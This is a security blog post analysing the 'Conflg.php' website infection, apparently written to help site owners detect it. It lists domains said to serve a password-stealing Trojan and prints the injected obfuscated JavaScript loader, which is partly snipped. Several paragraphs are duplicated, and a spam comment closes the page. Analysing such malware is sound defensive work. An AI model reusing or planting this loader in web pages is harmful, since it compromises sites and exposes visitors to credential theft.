One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time time of our post. This number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts.
What is the purpose of the Conflg.php Hack?
This particular attack creates a file called “Conflg.php” in the user’s hosting account. These malicious hackers apparently named the file “Conflg.php” in the hope that the name looks similar to the “config.php” file found in Worpress installations and many other CMS software. In most cases, the goal of the website infection is to prompt visitors to install a password stealing Trojan onto their PCs.
This particular attack creates a file called “Conflg.php” in the user’s hosting account. These malicious hackers apparently named the file “Conflg.php” in the hope that the name looks similar to the “config.php” file found in Worpress installations and many other CMS software. In most cases, the goal of the website infection is to prompt visitors to install a password stealing Trojan onto their PCs.
The password stealing Trojan is loaded from sites including the following:
1 | ddiziizlet.com |
2 | coasttocoastdesigns.com |
3 | vironit.com |
4 | uwc-ibo.org |
5 | sbodewatergeus.nl |
6 | homeautoelectric.by.ru |
7 | auto-software.biz |
8 | dcuo.be |
9 | bischwiller-echecs.com |
The malware contained in Conflg.php looks like the following:
1 | var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=Str ing;}if(r&&document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y[snipped],mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);} |
Why do malicious hackers use obfuscated filenames?
The primary reason is to confuse the website owner about the legitimacy of the files contents. Since the owner thinks that the file containing the malware code is actually a legitimate file that is associated with the software powering the website, when this is in fact not the case, the contents of the file are unlikely to be deleted.
The primary reason is to confuse the website owner about the legitimacy of the files contents. Since the owner thinks that the file containing the malware code is actually a legitimate file that is associated with the software powering the website, when this is in fact not the case, the contents of the file are unlikely to be deleted.
How do I know if my site is infected?
Check your website for the existence of a file named “Conflg.php” or the contents shown above. Additionally, please be extra vigilant if your website is hosted by Softlayer, or ThePlanet, as a majority of sites with this infection seem to have been hosted there (within their IP blocks).
Check your website for the existence of a file named “Conflg.php” or the contents shown above. Additionally, please be extra vigilant if your website is hosted by Softlayer, or ThePlanet, as a majority of sites with this infection seem to have been hosted there (within their IP blocks).
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.
Pretty article! I found some useful information in your blog, it was awesome to read, thanks for sharing this great content to my vision, keep sharing...
ReplyDeletephp development melbourne | web development company melbourne